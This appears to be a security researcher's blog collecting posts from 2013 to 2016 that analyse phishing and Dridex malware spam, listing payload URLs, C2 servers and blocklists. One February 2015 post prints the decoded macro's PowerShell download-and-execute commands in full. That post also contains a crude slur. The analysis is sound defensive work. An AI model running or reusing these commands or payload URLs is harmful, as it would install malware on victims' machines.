Sponsored by..

Showing posts with label 1&1. Show all posts
Showing posts with label 1&1. Show all posts

Tuesday, 24 May 2016

Phish: "TNT Consignment Notification" via rit.edu

This fake TNT notification is phishing for credentials:

From:    TNT Express
Reply-To:    sh3llsh0p@yahoo.com
Date:    24 May 2016 at 11:34
Subject:    TNT Consignment Notification

Attention: [redacted],

TNT is pleased to advise you that ANTONIOU KONSTANTINOS has arranged for a shipment to be collected from them on May 23, 2016 , and delivered to You on 275th May 2016.
The shipment has a TNT CONSIGNMENT NOTE NUMBER: 119138390

To be able to check the status of the shipment simply visit or click below to track.



http://www.tnt.com/webtracker/tracking.do?navigation=1&searchType=CON&respLang=en&respCountry=GENERIC&genericSiteIdent=.&cons=119138390


From :
ANTONIOU KONSTANTINOS
Theokritou 5
THESSALONIKI
THESSALONIKIS
546 27
GR

Pieces : 1
Weight : 0.5 KG
Shipment reference :
Description : sample
If you would like to find out about the many ways TNT helps you to track your shipment, or if you would like to know more about the services provided by TNT, simply connect to www.tnt.com and select your location at any time.


---------------------------------------------------------------------------------------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
Please consider the environmental impact before printing this document and its attachment(s). Print black and white and double-sided where possible.
------------------------------------------------------------------------------
The link in the email is disguised to make it look like a link to tnt.com, but in face it goes to:

heurica.dk/tnt1/?email=[redacted]

which then forwards to

booking-smart-swim-school.co.uk/images/TNT/index.php?rand=13InboxLightaspxn.1774256418&fid&1252899642&fid.1&fav.1&email=[redacted]

This URLquery report shows what is going on, as the victim ends up on a laughably fake phishing page:


Presumably this is phishing for general email credentials rather than a TNT login. Orignating IP is 87.106.178.108 (1&1, Germany) via an apparently compromised account or server at pmdf01b.rit.edu



Wednesday, 9 March 2016

Malware spam: "DOC-Z21193008" / Idris Mohammed [idrismohammed25@gmail.com]

This terse spam has a malicious attachment. There is no body text.
From:    Idris Mohammed [idrismohammed25@gmail.com]
Date:    9 March 2016 at 09:55
Subject:    DOC-Z21193008
Attached is a file img-DOC-Z21193008.docm which I have seen two versions of (VirusTotal results [1] [2]). Automated analysis [3] [4] [5] [6] shows the macro in these two documents downloading from:
 
gpcarshop.com.br/system/logs/07yhnt7r64.exe
karnavalnye.com/system/logs/07yhnt7r64.exe


There are no doubt several other download locations. This binary has a detection rate of 3/56. The various reports indicate that it phones home to a server at:

64.76.19.251 (Impsat, Argentina)

I strongly recommend that you block traffic to that IP. Payload is likely to be the Dridex banking trojan.

UPDATE

A contact sent some more download locations (thank you!)

oceanglass.com.my/system/logs/07yhnt7r64.exe
variant13.ru/system/logs/07yhnt7r64.exe
e-kalogritsas.gr/system/logs/07yhnt7r64.exe
notasvet.ru/system/logs/07yhnt7r64.exe
racingtrack.ru/system/logs/07yhnt7r64.exe


..and also some additional C2s..

188.40.224.78 (NoTag Community / Hetzner, Germany)
87.106.8.177 (1&1, Germany)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)


Recommended blocklist:
64.76.19.251
188.40.224.78
87.106.8.177
91.236.4.234




Thursday, 3 March 2016

Malware spam: "Receipt - Order No 173535" / Sally Webb [swebb@thekmgroup.co.uk]

This spam does not come from KM Media Group but it is instead a simple forgery with a malicious attachment:

From     Sally Webb [swebb@thekmgroup.co.uk]
Date     Thu, 03 Mar 2016 10:58:07 +0100
Subject     Receipt - Order No 173535

--

regards,
Sally


*Sally Webb*
Recruitment Media Sales Executive
KM Media Group

DDI : 01622 794500
Email : swebb@thekmgroup.co.uk

*KM Media Group is Kent's only independent multimedia company*

*433,751 readers*, 166,800 listeners** and 1,668,973 monthly unique
browsers*** Together we make a difference*

*Sources: * JICREG Apr 2015 / ** RAJAR Q1 2015 / *** ABC Jul - Dec 2014
Get local news direct to your inbox by subscribing to daily KM News Alerts
and the Kent Business newsletter and our weekly What's On round-up.*

Attached is a file Receipt - Order No 173535.docm which comes in several different versions with detectin rates around 3/55. Analysis from another source (thank you) gives download locations at:

coolsellers4u.com/catalog/controller/98yh87b564f.exe
corsian.com/system/logs/98yh87b564f.exe
demo.rent-shops.ru/foto/26/98yh87b564f.exe
dremasleep.by/system/logs/98yh87b564f.exe
euro-basket.ru/wp-content/upgrade/98yh87b564f.exe
isgim.com/system/logs/98yh87b564f.exe
jmc-thai.com/system/logs/98yh87b564f.exe
mevabekhuongnhi.com/system/logs/98yh87b564f.exe
msco.com.vn/system/logs/98yh87b564f.exe
myfabbfinds.com/system/logs/98yh87b564f.exe
partiduragi.com/system/logs/98yh87b564f.exe
paslanmazmobilya.org/system/logs/98yh87b564f.exe
vmagazin55.ru/system/logs/98yh87b564f.exe


The initial payload has a detection rate of 4/55 which has now been updated with a new payload with a similar detection rate. My source says that this is Dridex botnet 220 (not Locky) with C&C servers at:

188.40.224.78 (Hetzner / NoTaG Community, Germany)
78.108.93.186 (Majordomo LLC, Russia)
87.106.8.177 (1&1, Germany)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)


Recommended blocklist:
188.40.224.78
78.108.93.186
87.106.8.177
91.236.4.234


Thursday, 30 April 2015

Malware spam: "Rebecca McDonnell [rebecca@gascylindersuk.co.uk]" / "Telephone order form"

This fake financial email is not from Gas Cylinders UK but is instead a simple forgery with a malicious attachment.

From:    Rebecca McDonnell [rebecca@gascylindersuk.co.uk]
Date:    30 April 2015 at 09:54
Subject:    Telephone order form

Telephone order form attached
Regards,

Rebecca McDonnell
Business Administrator

340a Haydock Lane, Haydock Industrial Estate,
St Helens, Merseyside, WA11 9UY
DDI:  01744 304338
Fax: 01942 275 312
Email: rebecca@gascylindersuk.co.uk


***** D i s c l a i m e r *****

This e-mail message is confidential and may contain legally privileged information. If you are not the intended recipient you should not read, copy, distribute, disclose or otherwise use the information in this e-mail.  Please also telephone us on 0800 622 6330, immediately and delete the message from your system. E-mail may be susceptible to data corruption, interception and unauthorised amendment, and we do not accept liability for such corruption, interception or amendment or the consequences thereof.
There is a malicious Word document attached with the name TELEPHONE PURCHASE ORDER FORM.doc which probably comes in a few different variants, but the one I saw had a VirusTotal detection rate of 4/56 and contained this malicious macro [pastebin] which downloaded a component from the following location:

http://morristonrfcmalechoir.org/143/368.exe

This is saved as %TEMP%\serebok2.exe and has detection rate of 8/56. Analysis tools are a bit patchy today, but the VirusTotal report indicates traffic to:

212.227.89.182 (1&1, Germany)

The Malwr report reported a dropped Dridex DLL with a detection rate of 3/55.


Wednesday, 1 April 2015

Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"

The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment.

From:    Batchuser BATCHUSER [ecommsupport@cihgroup.com]
Date:    31 March 2015 at 09:15
Subject:    CIH Delivery Note 0051037484

**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD

**********************************************************************
Apart from the disclaimer there is no body text. If you do as the disclaimer says and run attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to clean, but it actually contains this malicious macro [pastebin] which downloads a component from:

http://www.tschoetz.de/122/091.exe

This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the the same binary which in this case has a detection rate of 5/56.

Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)

According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].

Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249

Thursday, 19 February 2015

Malware spam: "State Department" / "Order state T/N:" with a hidden message

These spam emails claim both to be from the "State Department" and somebody else at the same time, so I guess they must have been sent by the intern at Dridex HQ. And also they have a hidden message, apparently aimed at me..

From:    Hollie Wyatt , State Department
Date:    19 February 2015 at 12:13
Subject:    Order state T/N:XZ3543_327

Your order is ready for collection at your chosen store.View full order details T/N:XZ3543_327 in attached document.

Thanks!
Hollie Wyatt .
PRAETORIAN RESOURCES LTD

----------

From:    Jodi Russell , State Department
Date:    19 February 2015 at 12:16
Subject:    Order state T/N:HD6061_902

Your order is ready for collection at your chosen store.View full order details T/N:HD6061_902 in attached document.

Thanks!
Jodi Russell .
BARON OIL PLC

----------

From:    Nathanial Mckinney , State Department
Date:    19 February 2015 at 13:26
Subject:    Order state T/N:UH0141_809

Your order is ready for collection at your chosen store.View full order details T/N:UH0141_809 in attached document.

Thanks!
Nathanial Mckinney .
SIRIUS MINERALS PLC
Attached is a ZIP file that largely matches the reference number in the email, and inside that is a malicious spreadsheet called Order.xls which contains this macro.

In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
But wait.. what's this?
http://85.143.166.123/ssdynamooss/sspidarss.cab
"Пидар" is not in my limited Russian vocabulary, but it seems to translate as a tradition type of meatball in gravy.

Faggots with more sauce!  Hooray

Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:

85.143.166.123
85.143.166.72
85.143.166.132

37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105

So I think I'm going to recommend blocking a couple of Pirix /24s at the end.

Anyway.

The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab which it saves as %TEMP%\FgdgFFFgfgF.cab and it then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe which doesn't quite work as expected, because the .CAB file is already an .EXE file. Must the the intern again. Anyway, EXPAND simply copies the file from CAB to EXE so it still works.

This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:

82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

According to the Malwr report,  it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.

Update:
A second spam run is happening, with various senders and subjects, for example:
Byron Pittman , Bill Department
Freda Kelly , Bill Department
Leroy Gallegos , Bill Department
Terrence Reyes , Bill Department
Tyson Miller , Bill Department
Marlene Morales , Bill Department
Royal Byrd , Bill Department
Larry Kramer , Bill Department
Jenna Sparks , Bill Department
Debra Thomas , Bill Department

LE8427_395.zip attached   
MM4565_687.zip attached
SL7772_820.zip attached
MF9529_495.zip attached
DH0645_249.zip attached
ED9340_241.zip attached
HJ7305_966.zip attached
UA0899_018.zip attached
HO2362_958.zip attached
JL3695_098.zip attached
There are three different ZIP files, containing either Order.xls, Confirmation.xls or order_tatus.xls (sic). The macro is similar to the one above, but has a couple of other download locations.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

These are:

134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)

Payload is the same as before.


Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137

Tuesday, 17 February 2015

Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"

This fake financial document has a malicious attachment:

From:    AR.Support@efi.com
To:    minutemanpresschicago@comcast.net
Date:    17 February 2015 at 10:22
Subject:    Customer statement 0001031389 as on 02/05/2015

Dear EFI Customer,


Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.


Regards,
AR Support
AR.Support@efi.com


** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.

PO Box 742366
Los Angeles, CA. 90074-2366

Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.
Attached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2] containing two highly obfuscated modular macros [1] [2]  that actually just perform a ROT13 transformation on a couple of strings.

uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr

Which decodes to:

http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe

This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] shows the malware attempting to connect to:

202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)

According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.

Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105

Monday, 19 January 2015

Malware spam: "repairermessages@fmg.co.uk" / "Insurance Inspection Arranged AIG02377973" / "FMG Support Group Ltd"

This spam does not come from FMG Support Group Ltd, but instead it is a forgery. FMG are not sending out the spam, nor have their systems been compromised in any way. Instead, this spam has a malicious Word document attached.
From:    repairermessages@fmg.co.uk
Date:    19 January 2015 at 07:24
Subject:    Insurance Inspection Arranged AIG02377973

FMG is committed to reducing its impact on the environment. Please don't print this email unless absolutely necessary.

Have you been impressed by one of our people?
If so, we'd love to hear about it. You can nominate someone for a Spirit award by emailing spirit@fmg.co.uk

FMG Support Group Ltd. Registered in England. No. 06489429.
Registered office: FMG House, St Andrews Road, Huddersfield, HD1 6NA.

Tel: 0844 243 8888
Email: info@fmg.co.uk

This email may contain confidential information and/or copyright material. This email is intended for the use of the addressee only. Any unauthorised use may be unlawful. If you received this email by mistake, please advise the sender by using the reply facility in your email software.

Outbound Message checked by Websense Mail Control.
Attached is a Word document AIG02377973-InsuranceInspectionArranged.doc which comes in at least two different versions, neither of which are detected by AV vendors [1] [2]. These documents contain two slightly different malicious macros [1] [2] which attempt to download a further component from:

http://chilan.ca/js/bin.exe
http://techno-kar.ru/js/bin.exe

This is saved as %TEMP%\324234234.exe which has a VirusTotal detection rate of 2/57. The Malwr report shows it attempting to communicate with the following IPs:

59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)


These two IP addresses have been used by this malware for a long time, I strongly recommend you block them. Also, a malicious DLL is dropped on the infected system with a detection rate of just 2/53.
 

Thursday, 15 January 2015

Malware Spam: "HEXIS (UK) LIMITED" / "Invoice from Hexis"

This fake invoice has a malicious attachment. It does not comes from Hexis UK Ltd, it is a forgery. Hexis is not sending the spam, nor have their systems been compromised in any way.

From:    Invoice from Hexis [Invoice@hexis.co.uk]
Date:    15 January 2015 at 06:36
Subject:    Invoice

Sent 15 JAN 15 08:30

HEXIS (UK) LIMITED
7 Europa Way
Britannia Park
Lichfield
Staffordshire
WS14 9TZ

Telephone 01543 411221
Fax 01543 411246 
Attached is a malicious Word document S-INV-CREATIFX-465219.doc which actually comes in two different versions (perhaps more) with low detection rates [1] [2] containing two slightly different macros [1] [2] which download a component from one of the following locations:

http://dramakazuki.kesagiri.net/js/bin.exe
http://cassiope.cz/js/bin.exe

This has a VirusTotal detection rate of 3/57. That report shows the malware phoning home to 74.208.11.204:8080 (1&1 Internet, US) which is a familiar C&C server which you should definitely block traffic to. My sources also identify a couple of other IPs, giving a recommended blocklist of:

59.148.196.153
74.208.11.204
81.27.38.97


UPDATE: the Malwr report shows that it drops a DLL with a VirusTotal detection rate of just 1/57.



Wednesday, 24 December 2014

Malware spam: Rhianna Wellings / Rhianna@teckentrupdepot.co.uk / Signature Invoice 44281

Teckentrup Depot UK is a legitimate UK company, but these emails are not from Teckentrup Depot and they contain a malicious attachment. Teckentrup Depot has not been hacked, their database has not been compromised, and they are not responsible for this in any way.

From:    Rhianna Wellings [Rhianna@teckentrupdepot.co.uk]
Date:    24 December 2014 at 07:54
Subject:    Signature Invoice 44281

Your report is attached in DOC format.

To load the report, you will need the Microsoft® Word® reader, available to download at http://www.microsoft.com/
Attached is a malicious Word document called Signature Invoice.doc which comes in two different versions, both of which are undetected by AV vendors [1] [2]. Each one contains a different macro [1] [2] [pastebin] which then downloads an additional component from one of these two locations:

http://Lichtblick-tiere.de/js/bin.exe
http://sunfung.hk/js/bin.exe

The file is saved into the location %TEMP%\1V2MUY2XWYSFXQ.exe and currently has a VirusTotal detection rate of just 4/56. The ThreatExpert report shows traffic to the following IPs:

74.208.11.204 (1&1 Internet, US)
81.169.156.5 (Strato AG, Germany)
59.148.196.153 (HKBN, Hong Kong)

According to the Malwr report it also drops a malicious DLL with a detection rate of 24/56, detected as the Dridex banking trojan.

Recommended blocklist:
74.208.11.204
81.169.156.5
59.148.196.153
lichtblick-tiere.de
sunfung.hk

Wednesday, 17 December 2014

Malware spam: UK GEOLOGY PROJECT by "Rough & Tumble" with "Moussa Minerals" [roughandtumble63@yahoo.co.uk]

This somewhat odd and terse spam comes with a malicious attachment.

From:    UK GEOLOGY PROJECT by "Rough & Tumble" with "Moussa Minerals" <roughandtumble63@yahoo.co.uk>
Date:    17 December 2014 at 07:20
Subject:    Invoice as requested
There is no body text, but there is an malicious DOC attachment named 20140918_122519.doc which come in two slightly different versions with poor detection rates [1] [2]. The macros have been subtly changed from recent spam runs [1] [2] [pastebin] and download a second stage from one of the following locations:

http://openstacksg.com/js/bin.exe
http://worldinlens.net/js/bin.exe


This malicious executable is saved as %TEMP%\ADGYMSEKRJE.exe and has a detection rate of only 2/54.

Is is common with recent similar malware attempts, it attempts to phone home to 74.208.11.204 (1&1, US) as shown in the ThreatTrack report [pdf]. The Malwr report indicates a dropped file with an MD5 of ee826c184155a1fa1aea984f914e606a which is probably Dridex.

Wednesday, 10 December 2014

Spam: "Remittance Advice from Anglia Engineering Solutions Ltd"

This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.

From:     Serena Dotson
Date:     10 December 2014 at 10:33
Subject:     Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]

Dear ,

We are making a payment to you.

Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.

If you have any questions regarding the remittance please contact us using the details below.


Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd
Tel: 01469 520572

The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but are undetected by any AV product [1] [2] which contains one of two malicious macros [1] [2] [pastebin] which attempts to download an executable from the following locations:

http://217.174.240.46:8080/stat/lld.php
http://187.33.2.211:8080/stat/lld.php


This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55. The ThreatTrack report [pdf] shows attempted connections to the following IPs:

194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)

Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic.

The payload is most likely Dridex, a banking trojan.

I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201

217.174.240.46
187.33.2.211

Monday, 8 December 2014

"Soo Sutton" / "INVOICE 224245 from Power EC Ltd" spam

Another variant of this spam, this fake invoice comes with a malicious Word document attached.
From:     soo.sutton966@powercentre.com
Date:     8 December 2014 at 10:57
Subject:     INVOICE 224245 from Power EC Ltd

Please find attached INVOICE number 224245 from Power EC Ltd
Attached are one of two Word documents, both with the name 224245.doc but with slightly different macros. Neither are currently detected by any AV vendors [1] [2]. Inside the DOC is one of two malicious macros [1] [2] [pastebin] which then downloads an executable from one of the following locations:

http://aircraftpolish.com/js/bin.exe
http://gofoto.dk/js/bin.exe


This file is then saves as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:

203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)

According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53.

Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish.com
gofoto.dk

UPDATE 2014-12-09:

A further couple of variants are being spammed out, both with low detections by VirusTotal [1] [2] and containing one of two malicious macros [1] [2] [pastebin] which down,loads from the following locations:

http://kawachiya.biz/js/bin.exe
http://darttoolinc.com/js/bin.exe


This is then saved as %TEMP%\YVXBZJRGJYE.exe and is presently undetected by vendors. The Malwr report and ThreatExpert report vary slightly, but both show traffic to the same IPs are before. The Malwr report also indicates that a DLL is dropped with a detection rate of 4/52 which is identified as the Dridex trojan.

Recommended blocklist:
203.172.141.250
74.208.11.204
 kawachiya.biz
 darttoolinc.com

Thursday, 30 January 2014

WTF is s15443877[.]onlinehome-server[.]info?

Something that caught my eye was this Google Safebrowsing diagnostic for [donotclick]s15443877.onlinehome-server.info:

Safe Browsing

Diagnostic page for s15443877.onlinehome-server.info

What is the current listing status for s15443877.onlinehome-server.info?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Of the 1746 pages we tested on the site over the past 90 days, 582 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2014-01-29, and the last time suspicious content was found on this site was on 2014-01-29.Malicious software includes 166 scripting exploit(s), 166 trojan(s), 89 exploit(s). Successful infection resulted in an average of 5 new process(es) on the target machine.
Malicious software is hosted on 198 domain(s), including mendozaempleos.com/, e-veleta.com/, forogozoropoto.2waky.com/.
155 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including chebro.es/, formandfinishpdr.com/, mendozaempleos.com/.
This site was hosted on 1 network(s) including AS8560 (ONEANDONE-AS).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, s15443877.onlinehome-server.info did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Not only are (exactly) one third of the pages crawled hosting malware, but there are a staggering 198 domains spreading it. Usually it's just a handful of sites, but this is the most I've ever seen.

VirusTotal also shows some historical evil going on with the IP of 212.227.141.247 (1&1, Germany) and a Google of the site contents shows thousands of hits of what appears to be scraped content in Spanish.

It's hard to say just what this site is, but with Google diagnostics like that then it is unlikely to be anything good and blocking s15443877.onlinehome-server.info or 212.227.141.247 might be prudent.

Tuesday, 26 November 2013

Something evil on 46.19.139.236

46.19.139.236 (Private Layer Inc, Switzerland) seems to be serving up some sort of Java exploit kit via injection attacks which is utilising hijacked legitimate domains, but the domains in use seem to rotate pretty quickly and I haven't got a copy of the payload, but VirusTotal has some examples. These are the domains that I can find running from this IP:

ihavefound.boostprep.com
greedka.byjohnwhitaker.com
green.byjohnwhitaker.com
calc.clermontjumps.com
createmore.clermontjumps.com
freesam.clermontjumps.com
team.clermontjumps.com
breast.ddghost.com
edit.ddghost.com
podkast.ddghost.com
fingerpro.golfrangefinderpro.com
goingup.golfrangefinderpro.com
hksnet.golfrangefinderpro.com
wolfram.golfrangefinderpro.com
bracers.harrismetals.net
cupholder.harrismetals.biz
marriage.harrismetals.biz
materials.harrismetals.biz
stockings.harrismetals.biz
resume.hemorrhoidhometreatmentremedy.com
automatic.herdprogram.com
changed.herdprogram.com
selection.herdprogram.com
variator.herdprogram.com
customers.houston-heights-realtor.com
employee.houston-heights-realtor.com
management.houston-heights-realtor.com
salesmanager.houston-heights-realtor.com
trunam.migweldersforsale.org
demonstration.modelagent.com
promotion.modelagent.com
resume.modelagent.com
servers.modelagent.com
grand.q-host.com
coaches.redbrickplayers.org
concrete.redbrickplayers.org
fiit.redbrickplayers.org
newone.redbrickplayers.org
teams.redbrickplayers.org
button.roadally.org
cars.roadally.org
forums.roadally.org
honest.shattertag.com
server.shattertag.com
service.shattertag.com
tagger.shattertag.com
enter.skillstuff.com
horners.skillstuff.com
sim4you.skillstuff.com
skill.skillstuff.com
urllink.skillstuff.com
servers.sleepets.com
somethingnew.sleepets.com
buddies.southlakehosting.com
goodie.southlakehosting.com
goodluck.southlakehosting.com
honest.southlakehosting.com
namefiest.sugarlandtxhouses.com
soft4you.sugarlandtxhouses.com
blogs.treatmentforeczemaguide.com
disconnected.treatmentforeczemaguide.com
italia.treatmentforeczemaguide.com
template.treatmentforeczemaguide.com
ball.wildbounce.com
savannah.wildbounce.com

These seem to be a mix of GoDaddy, 1&1 and eNom registered domains that have been hijacked. Ones listed in italics have been flagged as malicious by Google:
boostprep.com
byjohnwhitaker.com
clermontjumps.com
ddghost.com

golfrangefinderpro.com
harrismetals.net
harrismetals.biz
hemorrhoidhometreatmentremedy.com

herdprogram.com
houston-heights-realtor.com
migweldersforsale.org

modelagent.com
q-host.com

redbrickplayers.org
roadally.org
shattertag.com
skillstuff.com
sleepets.com
southlakehosting.com

sugarlandtxhouses.com
treatmentforeczemaguide.com
wildbounce.com

Tuesday, 23 July 2013

Malware sites to block 23/7/13

These malicious domains and IPs are associated with this prolific gang.  As usual, I've listed IPs with hosts first and then a plain list of IPs and domains for copy-and-pasting at the end.

5.175.191.106 (GHOSTnet, Germany)
24.173.170.230 (Time Warner Cable, US)
31.145.19.17 (Borusan Telekom / Ericsson-NET, Turkey)
41.196.17.252 (Link Egypt, Egypt)
46.246.41.68 (Portlane Networks, Sweden)
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
50.97.253.162 (Softlayer, US)
54.225.124.116 (Amazon AWS, US)
59.77.36.225 (CERNET, China)
59.124.33.215 (Chungwa Telecom, Taiwan)
59.126.142.186 (Chungwa Telecom, Taiwan)
59.160.69.74 (TATA Communications, India)
61.28.143.133 (ETPI, Philippines)
62.76.44.105 (IT House / Clodo-Cloud, Russia)
69.60.115.92 (Colopronto, US)
74.62.189.22 (Time Warner Cable, US)
74.93.56.83 (Comcast, US)
74.208.246.145 (1&1, US)
85.17.224.131 (Leaseweb, Netherlands)
85.119.187.145 (UniWeb, Belgium)
88.86.100.2 (Supernetwork / Castlegem, Czech Republic)
88.150.191.194 (Redstation, UK)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
95.111.32.249 (Mobitel EAD, Bulgaria)
108.170.32.179 (Secured Servers, US)
108.179.8.103 (Tyco / Cablevision, US)
109.123.125.68 (UK2.net, UK)
114.112.172.34 (Worldcom Teda Networks Technology, China)
119.92.209.120 (Makati  IPG, Philippines)
120.124.132.123 (TANET, Taiwan)
121.83.197.179 (K-Opticom Corporation, Japan)
128.252.158.57 (Washington University, US)
138.80.14.27 (Charles Darwin University, Australia)
140.120.113.18 (TANET, Taiwan)
162.209.80.221 (Rackspace, US)
165.225.149.235 (Joyent, US)
166.78.183.28 (Rackspace, US)
172.245.16.47 (New Wave NetConnect / ColoCrossing, US)
172.255.106.126 (Nobis Technology Group, US)
182.72.216.173 (CusDelight Consultancy Services, India)
188.40.92.12 (Hetzner, Germany)
188.132.213.115 (Mars Global Datacenter Services, Turkey)
188.134.26.172 (Perspectiva Ltd, Russia)
189.15.96.61 (Companhia De Telecomunicacoes Do Brasil Central , Brazil)
190.85.249.159 (Telmex Colombia, Colombia)
190.238.107.240 (Telefonica del Peru, Peru)
192.95.54.119 (OVH, Canada)
192.241.205.26 (Digital Ocean, US)
195.225.58.122 (C&A Connect SRL, Romania)
198.61.213.12 (Rackspace, US)
198.98.102.165 (Enzu, US)
198.175.124.17 (DNSSLAVE.COM, US)
202.197.127.42 (Hunan Normal University, China)
203.236.232.42 (KINX, Korea)
208.69.42.50 (Bay Area Video Coalition, US)
208.115.114.68 (WOWRACK, US)
209.222.67.251 (Razor Inc, US)
210.200.0.95 (Asia Pacific On-line Services, Taiwan)
211.224.204.141 (KINX, Korea)
212.143.233.159 (013 Netvision Network, Israel)
217.64.107.108 (Society Of Mali's Telecommunications , Mali)

5.175.191.106
24.173.170.230
31.145.19.17
41.196.17.252
46.246.41.68
46.45.182.27
50.97.253.162
54.225.124.116
59.77.36.225
59.124.33.215
59.126.142.186
59.160.69.74
61.28.143.133
62.76.44.105
69.60.115.92
74.62.189.22
74.93.56.83
74.208.246.145
85.17.224.131
85.119.187.145
88.86.100.2
88.150.191.194
95.87.1.19
95.111.32.249
108.170.32.179
108.179.8.103
109.123.125.68
114.112.172.34
119.92.209.120
120.124.132.123
121.83.197.179
128.252.158.57
138.80.14.27
140.120.113.18
162.209.80.221
165.225.149.235
166.78.183.28
172.245.16.47
172.255.106.126
182.72.216.173
188.40.92.12
188.132.213.115
188.134.26.172
189.15.96.61
190.85.249.159
190.238.107.240
192.95.54.119
192.241.205.26
195.225.58.122
198.61.213.12
198.98.102.165
198.175.124.17
202.197.127.42
203.236.232.42
208.69.42.50
208.115.114.68
